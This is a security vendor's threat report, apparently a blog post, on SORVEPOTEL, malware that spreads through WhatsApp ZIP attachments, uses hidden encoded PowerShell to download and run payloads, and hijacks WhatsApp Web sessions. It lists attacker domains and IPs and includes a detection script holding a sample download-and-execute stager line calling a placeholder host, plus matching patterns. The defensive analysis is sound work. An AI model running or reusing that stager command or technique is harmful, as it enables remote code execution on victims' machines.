Malware
Self-Propagating Malware Spreading Via WhatsApp, Targets Brazilian Users
Trend™ Research has identified an active campaign spreading via WhatsApp through a ZIP file attachment. When executed, the malware establishes persistence and hijacks the compromised WhatsApp account to send copies of itself to the victim’s contacts.
With contributions from Joe Soares
Key takeaways:
- SORVEPOTEL has been observed to spread across Windows systems with a message that requires users to open it on a desktop, suggesting that threat actors behind the campaign are targeting enterprises.
- The malware leverages active WhatsApp sessions to automatically distribute the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account, enabling rapid propagation.
- Current evidence suggests that the campaign’s main objective is widespread distribution rather than causing deeper system compromise. However, it should be noted that other Brazilian campaigns using similar techniques to SORVEPOTEL have previously targeted financial data.
Trend™ Research is currently investigating an aggressive malware campaign that leverages the online instant messaging platform WhatsApp as its primary infection vector. Unlike traditional attacks focused on theft or ransomware, this campaign is engineered for speed and propagation, abusing social trust and automation to spread among Windows users. Trend Research analysis identifies the campaign as SORVEPOTEL, which, as of writing, is most active in Brazil.
SORVEPOTEL has been observed to spread across Windows systems through convincing phishing messages with malicious ZIP file attachments. Interestingly, the phishing message that contains the malicious file attachment requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers. Once opened, the malware automatically propagates via WhatsApp Web, causing infected accounts to be banned due to excessive spam activity.
According to Trend Research telemetry, early campaign activity suggests a regional focus on Brazil: 457 of the 477 cases detected as of writing originate from Brazil.
Trend Research telemetry also shows that SORVEPOTEL has impacted government and public service organizations the most, but has also victimized organizations in manufacturing, technology, education, and construction.
Initial Infection Vector
The infection begins when a user receives a phishing message via WhatsApp from a compromised contact, typically an account belonging to a friend or colleague, which makes the message appear legitimate.
The message carries a ZIP archive attachment bearing a name such as "RES-20250930_112057.zip" or "ORCAMENTO_114418.zip," or something similarly disguised as a benign document, such as a receipt, budget, or health app-related file. Exploiting trust in WhatsApp conversations, the message, which is in Portuguese, encourages the user to "baixa o zip no PC e abre" (download the ZIP on the PC and open it).
Additionally, evidence shows that email is another possible initial infection vector for this campaign. Several phishing emails have been observed distributing ZIP attachments with names like "COMPROVANTE_20251001_094031.zip," "ComprovanteSantander-75319981.682657420.zip," and "NEW-20251001_133944-PED_1273E322.zip." These emails are sent from addresses that appear legitimate, often using subjects such as "Documento de Rafael B," "Zip," or "Extrato" to entice recipients into opening the malicious attachment.
Execution of Malicious LNK File
Upon extracting the ZIP file, the victim discovers a Windows shortcut (.LNK) file. When the LNK file is executed, this shortcut covertly launches a command-line or PowerShell script that downloads the primary malware payload from attacker-controlled domains.
By posing as a benign shortcut, the LNK file can evade basic antivirus detection. Similar activity is observed across various related domains, such as sorvetenopoate[.]com, sorvetenoopote[.]com, etenopote[.]com, expahnsiveuser[.]com, sorv[.]etenopote[.]com, and sorvetenopotel[.]com, all of which serve as API endpoints for the malicious payload delivery.

The decrypted command retrieves a malicious script from a specified URL and executes it in memory using the Invoke-Expression (IEX) function. It runs in hidden mode (-w hidden) to avoid the user's notice and leverages the encoded command (-enc) feature for additional payload obfuscation.

Batch Script Download and Persistence
The payload downloaded by the script is usually a batch file (.BAT), designed to establish persistence on the infected system. This is achieved by copying itself into the Windows Startup folder, ensuring that the malware runs automatically every time the computer boots.
The batch script utilizes several for loops to assemble and run a PowerShell command. This command is executed in a concealed window (-windowstyle hidden), with its parameters provided in Base64 encoded form (-enc) for added obfuscation.

Once decoded, the PowerShell command generates a URL that points to the command-and-control (C&C) server. Using Net.WebClient, the script downloads content from this address, which is then immediately executed in memory via Invoke-Expression. The malware maintains communication with multiple C&C servers, enabling it to receive further instructions or retrieve additional malicious components if required.
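Both the LNK stage and the batch stage described above share one detectable shape: a hidden-window PowerShell launch whose -enc argument, once Base64/UTF-16LE decoded, fetches content with Net.WebClient and runs it via Invoke-Expression. The following is an added defender-side example, not code from the original post or the malware; the sample command lines and the C&C host c2.example.invalid are constructed placeholders.

```python
import base64
import binascii
import re

# PowerShell's -EncodedCommand expects Base64 of the UTF-16LE script text.
def encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_ps(blob: str):
    """Return the decoded script, or None if the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None

# powershell.exe accepts unambiguous parameter prefixes, so match -w/-windowstyle
# and -e/-enc/-EncodedCommand (but not -ExecutionPolicy, which is followed by 'x').
HIDDEN = re.compile(r"-w(?:in[a-z]*)?\s+hidden", re.I)
ENCODED = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "invoke_expression": re.compile(r"Invoke-Expression|\bIEX\b", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download": re.compile(r"Download(?:String|Data|File)", re.I),
}

def analyze(cmdline: str) -> dict:
    """Decode an encoded PowerShell command line and flag the download-and-execute pattern."""
    hidden = bool(HIDDEN.search(cmdline))
    m = ENCODED.search(cmdline)
    decoded = decode_ps(m.group(1)) if m else None
    hits = sorted(k for k, rx in INDICATORS.items() if decoded and rx.search(decoded))
    return {
        "hidden_window": hidden,
        "encoded": m is not None,
        "decoded": decoded,
        "indicators": hits,
        # Hidden window plus an encoded payload that fetches remote content and runs it in memory.
        "suspicious": hidden and "invoke_expression" in hits and "webclient" in hits,
    }

# Constructed sample process-creation command lines (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/api/p')"
SAMPLES = [
    "powershell.exe -w hidden -enc " + encode_ps(STAGER),
    "powershell.exe -windowstyle hidden -enc " + encode_ps("Get-Date"),
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

def scan(cmdlines):
    """Return only the command lines matching the SORVEPOTEL-style stager pattern."""
    return [c for c in cmdlines if analyze(c)["suspicious"]]
```

Running `scan(SAMPLES)` flags only the first line; the second is encoded but harmless once decoded, and the third is neither hidden nor encoded.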

WhatsApp Web Session Hijack and Automated Propagation
Trend Research analysis found that a key feature of this malware is its ability to detect whether WhatsApp Web is active on the infected machine.
When detected, the malware leverages this session to automatically distribute the same malicious ZIP file to all contacts and groups associated with the victim’s compromised account, rapidly propagating itself.
This automated spreading results in a high volume of spam messages and frequently leads to account suspensions or bans due to violations of WhatsApp’s terms of service.
Post-Infection Behavior and Evasion
After initial infection, this malware continues to operate primarily as a self-propagating threat, with current evidence suggesting that its main objective is widespread distribution rather than causing deeper system compromise.
As of writing, reported cases show no significant signs of data exfiltration or file encryption. It is worth noting, however, that Brazilian campaigns using similar techniques, such as LNK shortcuts and PowerShell scripts, have previously targeted financial data.
To evade detection and maintain persistence, the malware employs several strategies: it uses obfuscated and typosquatted domains, such as “sorvetenopotel,” which closely resembles the innocuous Brazilian phrase “sorvete no pote” (ice cream in a cup). This tactic helps malicious infrastructure blend in with legitimate traffic and avoid immediate scrutiny.
Trend Research also observed potential links to additional infrastructure, including domains such as cliente[.]rte[.]com[.]br, which were used for malware distribution in the days leading up to larger campaign activity. These findings underscore the attackers’ continual efforts to update and diversify their delivery methods for maximum reach and stealth.
Conclusion
The SORVEPOTEL campaign demonstrates how threat actors are increasingly leveraging popular communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction. By combining convincing, tried-and-tested phishing tactics, automated session exploitation, and evasion techniques, SORVEPOTEL is likely to spread fast.
While the current impact centers on widespread infection and account bans rather than encryption, similarities to past Brazilian campaigns underline the potential for future evolution.
Vigilance, user awareness, and effective security controls are essential to mitigating this and similar threats. Trend Micro continues to monitor this campaign closely and recommends maintaining up-to-date defenses while staying informed about emerging attack techniques targeting messaging platforms.
Defense Recommendations
To minimize the risks associated with the SORVEPOTEL campaign, Trend recommends several practical initial defense items:
- Disable Auto-Downloads on WhatsApp. Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.
- Control File Transfers on Personal Apps. Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.
- Enhance User Awareness. The victimology of the SORVEPOTEL campaign suggests that attackers are targeting enterprises. Organizations are recommended to provide regular security training to help employees recognize the dangers of downloading files via messaging platforms. Advise users to avoid clicking on unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.
Implementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications.
Proactive security with Trend Vision One™
Trend Vision One™ is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management, security operations, and robust layered protection. This holistic approach helps enterprises predict and prevent threats, accelerating proactive security outcomes across their respective digital estate. Eliminate security blind spots, focus on what matters most, and elevate security into a strategic partner for innovation, especially in the case of novel malware threats such as the one discussed in this blog.
Trend Vision One™ Threat Intelligence
To stay ahead of evolving threats, Trend customers can access Trend Vision One™ Threat Insights, which provides the latest insights from Trend™ Research on emerging threats and threat actors.
Trend Vision One Threat Insights
- Emerging Threats: WhatsApp Under Siege: Self-Propagating Malware Targets Brazilian Users
Trend Vision One Intelligence Reports (IOC Sweeping)
Hunting Queries
Trend Vision One Search App
Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.
Search for outbound connections to known malicious IP addresses associated with Comprovante WhatsApp
eventId:3 AND eventSubId:204 AND (dst:109.176.30.141 OR dst:165.154.254.44 OR dst:23.227.203.148 OR dst:77.111.101.169)
Indicators of Compromise (IoCs)
Indicators of Compromise can be found here.